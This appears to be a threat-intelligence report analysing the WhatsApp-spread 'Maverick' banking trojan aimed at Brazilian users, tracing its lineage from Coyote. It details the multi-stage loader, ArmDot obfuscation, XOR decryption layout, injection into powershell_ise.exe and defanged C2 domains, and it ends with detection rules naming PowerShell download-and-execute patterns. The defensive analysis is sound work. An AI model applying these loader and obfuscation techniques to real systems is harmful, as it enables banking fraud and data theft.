Advanced Banking Trojan Maverick Uses WhatsApp to Prey on Brazilian Users

The PowerShell script executes code hosted at a remote domain. Currently, BlueVoyant researchers have identified two domains being operated by the adversary:  

• zapgrande[.]com  
• sorvetenopote[.]com  

BlueVoyant captured the server’s response, which delivered a follow-on PowerShell script. The script decodes a decimal array into a byte buffer and reflectively loads it in memory via PowerShell. The decoded buffer reconstructs a 64-bit .NET DLL, which is responsible for downloading additional payloads.

Initial analysis of the .NET DLL showed that it was using a commercial obfuscator known as ArmDot. The obfuscator purposely scrambles functions and hides/encrypts strings to hinder analysis. 

While debugging the .NET DLL, BlueVoyant researchers found the sample embeds many key strings as byte blobs inside randomly named methods. At runtime, it reads bytes at predefined offsets from those blobs and XOR decodes them with a single byte key to recover the strings, including the URLs used to download additional payloads.

Once the payload is downloaded, the .NET DLL contains logic to read the fourth byte from the end of the payload as the XOR key length. It then proceeds to read the bytes immediately preceding the expected XOR key length byte, storing them as the XOR key. In our samples, the expected key size was always 0x10 (16 in decimal). Initial analysis of the decrypted payloads resembled shellcode. 

Researchers at TrendMicro recently released identical research, naming the threat SORVEPOTEL. Consistent with their findings, BlueVoyant researchers observed that two distinct payloads were downloaded and reflectively loaded into separate instances of powershell_ise.exe.

The first of the two payloads, both implemented as .NET executables, contained a class named Maverick StageOne; this was the first of three components named Maverick in the code, which prompted the malware name Maverick. This component was designed to compromise the victim’s WhatsApp application and propagate the initial ZIP archive to all contacts within the user’s address book. 

The second payload, which included a class named Maverick StageTwo, was designed to monitor the user's active browser session. It would extract the domain of the website currently being accessed and compare it against a hardcoded list of target domains. If a match was found, the payload would decrypt and execute an embedded binary referred to as Maverick Agent. This binary acted as a banking trojan and remote access trojan (RAT), enabling communication with a predefined command-and-control (C2) server to potentially steal sensitive information or provide remote access to the compromised system. BlueVoyant researchers observed that the Maverick Agent command and control (C2) communications use the Watson TCP client library for .NET (“Watson Client”) to handle the underlying TCP traffic. 

Coyote to Maverick Evolution  

BlueVoyant assesses the Maverick malware attack campaign is an evolution of the Coyote malware profiled in the Brazil-based Tempest’s SideChannel blog from late May 2025. The recently published (and updated on 4 October 2025) TrendMicro research describing SORVEPOTEL malware also supports this conclusion as it is from the same campaign BlueVoyant encountered. 

BlueVoyant assesses the core infection flow and targeting remains consistent across these linked malware campaigns. The thread running through the reported activity is a reliance on social engineering to deliver a ZIP containing a Windows LNK that decodes and runs an obfuscated PowerShell loader, which reflectively loads a .NET DLL and then injects shellcode to stage additional .NET payloads in memory. Furthermore, both the Coyote and Maverick (a.k.a. SORVEPOTEL) malware focus on Brazilian victims and financial targets, monitor active browsers for banking and crypto domains, and ultimately deliver a RAT/infostealer that can perform keylogging, capture screenshots, and manipulate windows. Both sets describe use of the Watson TCP/.NET client for C2 and memory-resident techniques to reduce disk artifacts. WhatsApp Web has also been central to propagation in recently described activity, with aggressive self-spreading that pushes the same malicious ZIP to the victim’s contacts and groups, reinforcing the worm-like characteristics first noted in the Coyote lineage. 

The newer Maverick analyses from TrendMicro and confirmed in this separate BlueVoyant research on the same activity, therefore, represent a likely evolution of the Coyote malware. BlueVoyant analyses further adds several reverse-engineering details identifying the downloader’s ArmDot obfuscation and the specific string-deobfuscation approach using byte blobs and XOR at fixed offsets. The usage of ArmDot marks an evolution from the February 2025 timeline details showing Coyote using the Donut service for code obfuscation. 

Moreover, BlueVoyant TFC research documents the exact XOR-decryption scheme for payloads (key length stored as the fourth byte from the end, with a 0x10 key size in observed samples), approximate payload sizes (~1.6 MB and ~107 KB), and the creation of two powershell_ise.exe instances to host each payload. This report also captures the server response flow in which a PowerShell script decodes a decimal array into a byte buffer to reconstruct the 64-bit .NET and it names a distinct C2 for the RAT stage (casadecampoamazonas[.]com), providing variant-specific infrastructure that differs from earlier reporting.  

Conclusion 

BlueVoyant SOC and TFC researchers tracked and analyzed a malware campaign targeting Brazilian users via WhatsApp, where victims are lured into downloading a ZIP archive containing a shortcut (.lnk) file. This analysis confirms and adds to the details published by TrendMicro on this activity while also highlighting the similarities with a previous malware threat named Coyote, suggesting Maverick as its evolution. 

As such, Maverick presents as a WhatsApp-delivered banking malware that inherits and extends the Coyote malware lineage with a multi-stage, memory resident chain, robust obfuscation, and targeted activation against Brazilian financial and crypto domains. 

BlueVoyant’s analysis details an ArmDot-protected .NET downloader, custom request headers, disciplined XOR decryption, and powershell_ise.exe injection that culminate in a RAT with Watson TCP C2 and Brazil-specific geolocation gates. The campaign’s reliance on social trust, LNK shortcuts, and hidden, Base64-encoded PowerShell loaders, coupled with observed differences in header authentication across samples, underscores active development and rapid iteration by the adversary.  

Defenders should prioritize controls that break this chain early and surface its telltale behaviors: 

• Restrict or block execution of LNK attachments from messaging platforms, harden and monitor PowerShell (e.g., block powershell_ise.exe, alert on -enc/InvokeExpression/Net.WebClient)
• Watch for obfuscated Startup BAT files and unusual registry or Startup persistence
• Leverage EDR to detect inmemory .NET CLR hosting and shellcode injection

Network protections should block or flag traffic to identified infrastructure (e.g., zapgrande[.]com, sorvetenopote[.]com, casadecampoamazonas[.]com) and look for anomalous custom headers. Because WhatsApp is central to propagation, enforce clear BYOD and messaging policies, and educate users to distrust unsolicited ZIPs—even from known contacts. 

BlueVoyant will continue monitoring this campaign and recommends maintaining updated detections mapped to these TTPs as the actor iterates on infrastructure and loader authentication.